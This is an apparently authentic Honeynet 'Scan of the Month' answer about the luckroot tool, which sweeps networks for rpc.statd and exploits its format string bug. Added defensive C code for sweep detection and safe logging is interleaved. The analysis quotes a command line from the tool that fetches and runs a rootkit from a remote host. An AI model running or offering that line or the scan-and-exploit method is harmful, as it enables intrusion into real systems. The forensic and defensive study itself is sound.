From cata@net4u.ro Fri Mar 23 10:14:51 2001
Date: Thu, 22 Mar 2001 13:48:29 +0200 (EET)
From: Catalin Ionescu
To: project@honeynet.org
Subject: Scan of the month - March

Scan #13

The scan for March, 2001. This month's challenge is unique as you are called upon to analyze an extremely powerful but commonly used tool used by the blackhat community.

___________________________________________________________

The Challenge:

QUESTION 1. What is the blackhat attempting to do with his command line syntax?

As we will see later, it runs an automated probing tool several times, scanning various portions of the IP address space, in an attempt to find and gain administrative access to vulnerable servers.

QUESTION 2. What does the tool accomplish?

This is an automated vulnerability probing tool. It scans entire nets looking for hosts running rpc.statd, and when such hosts are found, it attempts to exploit a known vulnerability (a format string vulnerability) in the daemon. This vulnerability is present in all versions of rpc.statd starting with nfs-utils-0.1.6 and up to knfsd-1.4.7-7. The vulnerability was presented to BUGTRAQ readers on 1 August 2000 along with a working exploit by Doing.

QUESTION 3. How does the tool work?

luckgo is a shell script that launches luckscan-a, which expects four parameters on the command line:

    luckscan-a A port B C

luckgo sets port to 111 and passes A, B and C from the command line, provided at least A is given. A, B and C are the first three octets of a dotted-decimal IP address A.B.C.D; port is the port whose state is checked on each host. A and port are mandatory. If not present, B and C are initialised to 0; D is always initialised to 0. A loop is then entered in which, for each increment of D, the resulting IP address is checked to see whether port is open. If it is, luckstatdx is automatically executed with the following parameters:

    luckstatdx -d host_type

host_type is 0, so the blackhat is targeting RedHat 6.2.
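The sweep just described, one source walking D from 0 to 255 and probing port 111 on every resulting address, leaves a recognisable pattern in packet-filter logs. The C program below is an added example for defenders; it is not part of this analysis nor of the tool. It flags a source once it has hit port 111 on a run of consecutive destination addresses. The iptables-style log lines, the field names, the threshold of four hosts and all function names are constructed assumptions.

```c
/* Added example (not from the original analysis or the tool): flag a source
 * address that probes port 111 (rpc portmapper) on consecutive hosts, the
 * access pattern produced by walking A.B.C.0 .. A.B.C.255.
 * Log lines, field names and the threshold are constructed assumptions. */
#include <stdio.h>
#include <string.h>

#define MAX_SRC 16
#define SWEEP_THRESHOLD 4   /* assumed: this many consecutive hosts => sweep */

struct src_state {
    char addr[16];
    unsigned last_dst;      /* last destination seen, as a 32-bit integer */
    int run;                /* length of the current consecutive-host run */
    int flagged;
};

static struct src_state table[MAX_SRC];
static int ntable;

/* Convert dotted-quad text to a host-order integer; 0 on parse failure. */
static int ip_to_u32(const char *s, unsigned *out)
{
    unsigned a, b, c, d;
    if (sscanf(s, "%u.%u.%u.%u", &a, &b, &c, &d) != 4) return 0;
    if (a > 255 || b > 255 || c > 255 || d > 255) return 0;
    *out = (a << 24) | (b << 16) | (c << 8) | d;
    return 1;
}

/* Find or create the per-source record; NULL when the table is full. */
static struct src_state *lookup(const char *src)
{
    for (int i = 0; i < ntable; i++)
        if (strcmp(table[i].addr, src) == 0) return &table[i];
    if (ntable == MAX_SRC) return NULL;
    struct src_state *e = &table[ntable++];
    snprintf(e->addr, sizeof e->addr, "%s", src);
    e->run = 0;
    e->flagged = 0;
    return e;
}

/* Feed one log line; returns 1 when this line first crosses the threshold. */
int feed_line(const char *line)
{
    char src[16], dst[16];
    unsigned dpt, dstv;
    const char *ps = strstr(line, "SRC="), *pd = strstr(line, "DST="),
               *pp = strstr(line, "DPT=");
    if (!ps || !pd || !pp) return 0;
    /* width limits keep the parse itself bounded */
    if (sscanf(ps + 4, "%15[0-9.]", src) != 1) return 0;
    if (sscanf(pd + 4, "%15[0-9.]", dst) != 1) return 0;
    if (sscanf(pp + 4, "%u", &dpt) != 1) return 0;
    if (dpt != 111 || !ip_to_u32(dst, &dstv)) return 0;

    struct src_state *e = lookup(src);
    if (!e) return 0;
    if (e->run > 0 && dstv == e->last_dst + 1)
        e->run++;               /* next address in sequence: extend the run */
    else
        e->run = 1;             /* anything else starts a new run */
    e->last_dst = dstv;
    if (e->run >= SWEEP_THRESHOLD && !e->flagged) {
        e->flagged = 1;
        return 1;
    }
    return 0;
}

/* Run the detector over newline-separated log text; returns the number of
 * sources flagged as sweeping port 111. */
int count_sweeping_sources(const char *log)
{
    ntable = 0;
    int flagged = 0;
    char buf[256];
    const char *p = log;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, p, len);
        buf[len] = '\0';
        flagged += feed_line(buf);
        if (!nl) break;
        p = nl + 1;
    }
    return flagged;
}

/* Constructed sample: 192.0.2.7 walks 10.0.5.1..10.0.5.5 on port 111, one
 * host makes a single connection, another hits port 111 on scattered hosts. */
const char *SAMPLE_LOG =
    "Mar 22 13:48:01 gw kernel: IN=eth0 SRC=192.0.2.7 DST=10.0.5.1 PROTO=TCP DPT=111\n"
    "Mar 22 13:48:01 gw kernel: IN=eth0 SRC=192.0.2.7 DST=10.0.5.2 PROTO=TCP DPT=111\n"
    "Mar 22 13:48:01 gw kernel: IN=eth0 SRC=198.51.100.3 DST=10.0.5.9 PROTO=TCP DPT=111\n"
    "Mar 22 13:48:02 gw kernel: IN=eth0 SRC=192.0.2.7 DST=10.0.5.3 PROTO=TCP DPT=111\n"
    "Mar 22 13:48:02 gw kernel: IN=eth0 SRC=203.0.113.5 DST=10.0.5.20 PROTO=TCP DPT=111\n"
    "Mar 22 13:48:02 gw kernel: IN=eth0 SRC=192.0.2.7 DST=10.0.5.4 PROTO=TCP DPT=111\n"
    "Mar 22 13:48:02 gw kernel: IN=eth0 SRC=203.0.113.5 DST=10.0.5.200 PROTO=TCP DPT=111\n"
    "Mar 22 13:48:03 gw kernel: IN=eth0 SRC=192.0.2.7 DST=10.0.5.5 PROTO=TCP DPT=111\n";

int main(void)
{
    printf("sweeping sources: %d\n", count_sweeping_sources(SAMPLE_LOG));
    return 0;
}
```

Only the sequential source trips the detector; the scattered hits on port 111 from the third address stay below the threshold, which is the trade-off of keying on consecutive destinations: a scanner that randomises its order needs a per-source distinct-host count instead.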
The target is the IP address found above. Returning to the loop, D is incremented by one at each iteration until it reaches 255; it is then reset to 0 and C is incremented by one. The loop continues in the same manner with B and A, indefinitely.

A good explanation of the technique used in this vulnerability can be found, along with a working exploit, in the file published by ron1n. The original file can be retrieved from many places, one of them being http://neworder.box.sk. To summarize from ron1n's explanations:

"rpc.statd is an ONC RPC server that implements the Network Status Monitor RPC protocol to provide reboot notification. It is used by the NFS file locking service (rpc.lockd) when it performs lock recovery. Due to a format string vulnerability in a call to syslog() within its logging module, rpc.statd can be exploited remotely by script kids bent on breaking into your Redhat Linux box and defacing your website with crackpot political musings. This is not a traditional buffer overflow vulnerability. The data are kept within the bounds of the buffer by means of a call to vsnprintf(). The saved return address can be overwritten indirectly without a contiguous payload. syslog() is given, for the most part, a user-supplied format string with no process-supplied arguments."

QUESTION 4. Is this tool a worm, or would you classify it as something else?

An Internet worm, by generally accepted definitions, is a program capable of multiplying itself without requiring human interaction. This tool is an automated probing and exploiting tool. However, at some point in luckstatdx an archive is retrieved from www.becys.org, extracted, and a program found inside is run. As the content of that archive is unknown, if it contains a copy of LUCKROOT.TAR, the tool may be considered a worm.
However, patterns in the keystrokes recorded by the honeypot (several attempts to expand the .tar archive, a mistake when running luckgo) made me believe it is a human who is logged on to the honeypot, not an electronic program.

QUESTION 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

The luckstatdx.c exploit is copied from the one published on 24 July 2000 by ron1n. I presume that luckscan-a.c is also based on previous tools, but was unable to find an approximate match. Additional evidence supporting this theory is that in the original .TAR archive, luckscan-a.c has a timestamp more than two months earlier than the rest of the files. In luckstatdx.c, ron1n's comments were removed from the beginning, and his name replaced with becys in the usage() function. In the runshell() function, the commands to be executed on the remote server were changed, adding an automated trojan download and install. Several other messages displayed during program launch were also changed.

BONUS QUESTION: What information can you obtain about who is using or created the tool?

First we check whether the precompiled binaries were obtained by compiling the C sources. We run strings luckstatdx | less and notice that in the precompiled binary, in the runshell() function, the commands to be executed on the remote server are changed. In the binary we found the following commands:

    cd /; uname -a; id; wget neamtu.lsa.ro/rg.tgz; tar zxvf rk.tgz; cd 2; ./install.sh; cd /; rm -rf rk.tgz; rm -rf 2

The URL for the trojan is different, pointing out that either neamtu.lsa.ro was broken into earlier, or the tool was created on that machine. The machine was located in Romania, but is down. Also, in luckstatdx.c, we found a comment added by Becys that appeared to be written in Romanian.
Thus, we believe that both the blackhat who created this tool and the one who is using it (though we have no evidence of more than one person being involved) are from Romania. Examination of users and other information presented in the .TAR headers did not reveal anything further. Following the path to the URL from which the trojan kit is downloaded led nowhere, as the domain becys.org has been suspended by the provider. We presume it was bought with a fake credit card by the blackhat from Web Site Source, a domain hosting provider.

Catalin Ionescu
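The rpc.statd weakness the answers to Questions 2 and 3 rely on is the logging pattern ron1n describes: a string that came from the network ends up as the format argument of a printf-family call, so vsnprintf() bounding the buffer does nothing to stop "%x", "%s" or "%n" from being interpreted. The C below is an added example written for this page; it is not code from rpc.statd, from the tool, or from the original analysis. It shows the hardened call shape next to the vulnerable one (the latter only as a comment) and a small pre-check useful in tests. All function names and the sample input are constructed.

```c
/* Added example, not code from rpc.statd, the tool, or the original analysis:
 * the logging pattern behind the rpc.statd format string bug, beside its
 * hardened form. Function names and sample input are constructed. */
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* The vulnerable shape: text from the network becomes the *format* argument,
 * so conversion directives inside it are interpreted by vsnprintf()/syslog().
 * Kept as a comment only; a printf-family function must never be called
 * this way.
 *
 *     char buf[256];
 *     snprintf(buf, sizeof buf, untrusted);  // untrusted is the format
 *     syslog(LOG_ERR, buf);                  // same mistake, one layer up
 */

/* Hardened form: the format is a literal and the untrusted text is a "%s"
 * argument, so directives in it are copied as plain characters. Returns
 * what snprintf returns: the length the full message would have. */
int format_untrusted(char *out, size_t n, const char *untrusted)
{
    return snprintf(out, n, "%s", untrusted);
}

/* Same rule applied to syslog(): literal format, peer data only as arguments. */
void log_peer_message(const char *peer, const char *untrusted)
{
    syslog(LOG_ERR, "message from %s: %s", peer, untrusted);
}

/* Cheap pre-check for unit tests and fuzz harnesses: count '%' conversion
 * introducers in a string about to be logged. A non-zero count on data that
 * reaches a format position is a bug signal; on data that is only ever passed
 * as a "%s" argument it is harmless. "%%" is a literal percent sign. */
int count_format_introducers(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s == '%') {
            if (s[1] == '%') s++;
            else n++;
        }
    }
    return n;
}

int main(void)
{
    char out[64];
    const char *probe = "%x%x%x%n";   /* constructed hostile-looking input */
    format_untrusted(out, sizeof out, probe);
    printf("logged verbatim: %s (introducers: %d)\n", out,
           count_format_introducers(probe));
    return 0;
}
```

With the literal format in place the probe string is logged as eight ordinary characters; the introducer count is what a harness would assert to be zero on any value that is about to be used as a format rather than as an argument.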